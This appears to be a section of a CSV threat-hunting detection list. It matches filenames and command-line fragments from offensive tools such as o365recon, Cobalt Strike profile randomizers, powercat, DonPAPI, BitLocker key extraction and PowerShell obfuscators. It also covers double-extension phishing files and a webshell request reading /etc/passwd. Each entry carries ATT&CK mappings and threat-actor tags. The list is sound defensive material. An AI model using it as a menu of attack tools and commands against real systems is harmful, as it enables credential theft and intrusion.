"*.O365.Users_LDAP_details.txt*",".{0,1000}\.O365\.Users_LDAP_details\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4715"
"*.O365.Users_ProxyAddresses.txt*",".{0,1000}\.O365\.Users_ProxyAddresses\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4716"
"*.onion/chat.html?*",".{0,1000}\.onion\/chat\.html\?.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","4717"
"*.onion:31337*",".{0,1000}\.onion\:31337.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","4718"
"*.onion:8000*",".{0,1000}\.onion\:8000.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","4719"
"*.onion:81*",".{0,1000}\.onion\:81.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","4720"
"*.pdf.bat*",".{0,1000}\.pdf\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4721"
"*.pdf.dll*",".{0,1000}\.pdf\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4722"
"*.pdf.exe*",".{0,1000}\.pdf\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4723"
"*.pdf.htm",".{0,1000}\.pdf\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4724"
"*.pdf.iso*",".{0,1000}\.pdf\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4725"
"*.pdf.jar*",".{0,1000}\.pdf\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4726"
"*.pdf.jasmin*",".{0,1000}\.pdf\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4727"
"*.pdf.js*",".{0,1000}\.pdf\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4728"
"*.pdf.sfx*",".{0,1000}\.pdf\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4729"
"*.pdf.vbs*",".{0,1000}\.pdf\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4730"
"*.pfx -Domain * -PatchLsass*",".{0,1000}\.pfx\s\-Domain\s.{0,1000}\s\-PatchLsass.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","0","N/A","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","4731"
"*.photos.123456.*",".{0,1000}\.photos\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4732"
"*.php?cmd=cat+/etc/passwd*",".{0,1000}\.php\?cmd\=cat\+\/etc\/passwd.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","#linux","N/A","10","1","N/A","N/A","N/A","N/A","4733"
"*.pic.123456.*",".{0,1000}\.pic\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4734"
"*.pipename_stager*",".{0,1000}\.pipename_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4735"
"*.png.jasmin*",".{0,1000}\.png\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4736"
"*.pop.123456.*",".{0,1000}\.pop\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4737"
"*.powerview.ldap_session*",".{0,1000}\.powerview\.ldap_session.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#content","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","4738"
"*.ppt.bat*",".{0,1000}\.ppt\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4739"
"*.ppt.dll*",".{0,1000}\.ppt\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4740"
"*.ppt.exe*",".{0,1000}\.ppt\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4741"
"*.ppt.htm*",".{0,1000}\.ppt\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4742"
"*.ppt.iso*",".{0,1000}\.ppt\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4743"
"*.ppt.jar*",".{0,1000}\.ppt\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4744"
"*.ppt.js*",".{0,1000}\.ppt\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4745"
"*.ppt.sfx*",".{0,1000}\.ppt\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4746"
"*.ppt.vbs*",".{0,1000}\.ppt\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4747"
"*.pptx.bat*",".{0,1000}\.pptx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4748"
"*.pptx.dll*",".{0,1000}\.pptx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4749"
"*.pptx.exe*",".{0,1000}\.pptx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4750"
"*.pptx.htm*",".{0,1000}\.pptx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4751"
"*.pptx.iso*",".{0,1000}\.pptx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4752"
"*.pptx.jar*",".{0,1000}\.pptx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4753"
"*.pptx.jasmin*",".{0,1000}\.pptx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4754"
"*.pptx.js*",".{0,1000}\.pptx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4755"
"*.pptx.sfx*",".{0,1000}\.pptx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4756"
"*.pptx.vbs*",".{0,1000}\.pptx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4757"
"*.PrivilegeEscalation.Exchange*",".{0,1000}\.PrivilegeEscalation\.Exchange.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4758"
"*.ps1 -Base *OU=*DC=* -Credentials * -Server *",".{0,1000}\.ps1\s\-Base\s.{0,1000}OU\=.{0,1000}DC\=.{0,1000}\s\-Credentials\s.{0,1000}\s\-Server\s.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","4759"
"*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*",".{0,1000}\.ps1\s\-dcip\s.{0,1000}\s\-Username\s.{0,1000}\s\-Password.{0,1000}\s\-ExportToCSV\s.{0,1000}\.csv\s\-ExportToJSON\s.{0,1000}\.json.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","4760"
"*.ps1 -GPP -PView -Kerberoast*",".{0,1000}\.ps1\s\-GPP\s\-PView\s\-Kerberoast.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","4761"
"*.ps1 -l -p * -r dns:::*",".{0,1000}\.ps1\s\-l\s\-p\s.{0,1000}\s\-r\sdns\:\:\:.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","4762"
"*.ps1 -PrivEsc*",".{0,1000}\.ps1\s\-PrivEsc.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","4763"
"*.ps1 -StartWebServer Powershell*",".{0,1000}\.ps1\s\-StartWebServer\sPowershell.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4764"
"*.ps1 -StartWebServer Python*",".{0,1000}\.ps1\s\-StartWebServer\sPython.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4765"
"*.ps1 -technique BetterXencrypt*",".{0,1000}\.ps1\s\-technique\sBetterXencrypt.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4767"
"*.ps1 -technique Chameleon*",".{0,1000}\.ps1\s\-technique\sChameleon.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4768"
"*.ps1 -technique PSObfuscation*",".{0,1000}\.ps1\s\-technique\sPSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4769"
"*.ps1 -technique PyFuscation*",".{0,1000}\.ps1\s\-technique\sPyFuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4770"
"*.ps1 -technique ReverseB64*",".{0,1000}\.ps1\s\-technique\sReverseB64.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4771"
"*.ps1 -WifiPasswords Dump*",".{0,1000}\.ps1\s\-WifiPasswords\sDump.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4772"
"*.py  -credz *.txt * ",".{0,1000}\.py\s\s\-credz\s.{0,1000}\.txt\s.{0,1000}\s","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","4773"
